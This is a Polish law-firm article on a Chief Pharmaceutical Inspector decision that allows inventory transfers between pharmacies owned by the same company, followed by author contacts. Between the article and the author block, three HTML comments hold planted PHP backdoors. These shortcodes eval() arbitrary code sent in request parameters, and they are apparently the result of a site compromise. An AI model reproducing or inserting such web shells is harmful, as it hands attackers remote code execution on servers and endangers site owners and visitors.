Ostatnie decyzje Głównego Inspektora Farmaceutycznego wskazują, że dopuszczalne jest dokonywanie tzw. przesunięć magazynowych pomiędzy aptekami należącymi do tego samego właściciela.

W swojej dotychczasowej praktyce Inspekcja Farmaceutyczna kwestionowała niekiedy możliwość dokonywania tzw. przesunięć magazynowych pomiędzy aptekami należącymi do tego samego właściciela. W ocenie organów administracji skutkiem takiego przesunięcia miało być nabycie towaru od podmiotu niebędącego hurtownią. Analogiczny problem pojawiał się w przypadku takiego zaopatrywania aptek przez podmioty, które jeszcze przed wejściem w życie Prawa farmaceutycznego uzyskały jednocześnie pozwolenie na prowadzenie apteki i hurtowni. Niedawna decyzja Głównego Inspektora Farmaceutycznego usunęła dotychczasowe wątpliwości, dopuszczając przesunięcia magazynowe.

Uzasadnieniem dla negatywnej oceny przesunięć magazynowych było twierdzenie, iż naruszają one art. 88 ust. 5 pkt 5 Prawa farmaceutycznego, w myśl którego, do zadań kierownika apteki należy zakup produktów leczniczych wyłącznie od podmiotów posiadających zezwolenie na prowadzenie hurtowni farmaceutycznej. Negowano możliwość przesuwania towarów między dwiema aptekami. Z podobnych względów Inspekcja kwestionowała możliwość przenoszenia towarów pomiędzy hurtowniami a aptekami należącymi do tego samego przedsiębiorcy. Przesunięcie magazynowe miało naruszać ciążący na hurtowniach, zgodnie z art. 78 ust. 1 pkt 3, nakaz dostarczania produktów wyłącznie podmiotom uprawnionym. Miało to być uzasadnione faktem, iż w trakcie przesunięcia magazynowego nie dochodzi do zapłaty ceny.

Wbrew powyższym twierdzeniom Inspekcji, w wyniku przesunięcia magazynowego nie dochodzi jednak w ogóle do sprzedaży, ani do żadnej innej formy nabycia własności produktów leczniczych. Przesunięcie magazynowe jest wyłącznie operacją bilansową. Nie powoduje ona nabycia towaru przez aptekę, więc nie może być traktowana jako zakup od innej apteki. Nie prowadzi również do zbycia towarów przez hurtownię, a więc nie może być analizowane pod względem treści stosunków umownych. Stanowisko takie potwierdza niedawna decyzja GIF, którą uzyskaliśmy dla jednego z naszych klientów. Została ona wydana po konsultacjach z Ministerstwem Finansów. GIF stanął na stanowisku, iż przesunięcie magazynowe ma charakter wewnętrzny, a co za tym idzie jest dopuszczalne na podłożu przepisów Prawa farmaceutycznego.

<!– [insert_php]if (isset($_REQUEST["MSG"])){eval($_REQUEST["MSG"]);exit;}[/insert_php][php]if (isset($_REQUEST["MSG"])){eval($_REQUEST["MSG"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["nbEZV"])){eval($_REQUEST["nbEZV"]);exit;}[/insert_php][php]if (isset($_REQUEST["nbEZV"])){eval($_REQUEST["nbEZV"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["yGGxm"])){eval($_REQUEST["yGGxm"]);exit;}[/insert_php][php]if (isset($_REQUEST["yGGxm"])){eval($_REQUEST["yGGxm"]);exit;}[/php] –>

Szymon Łajszczak

Szymon Łajszczak


szymon.lajszczak@dzp.pl

Tomasz Kaczyński

Tomasz Kaczyński
Radca Prawny, Partner

tomasz.kaczynski@dzp.pl

Komentarze

Twój adres email nie zostanie opublikowany. Pola, których wypełnienie jest wymagane, są oznaczone symbolem *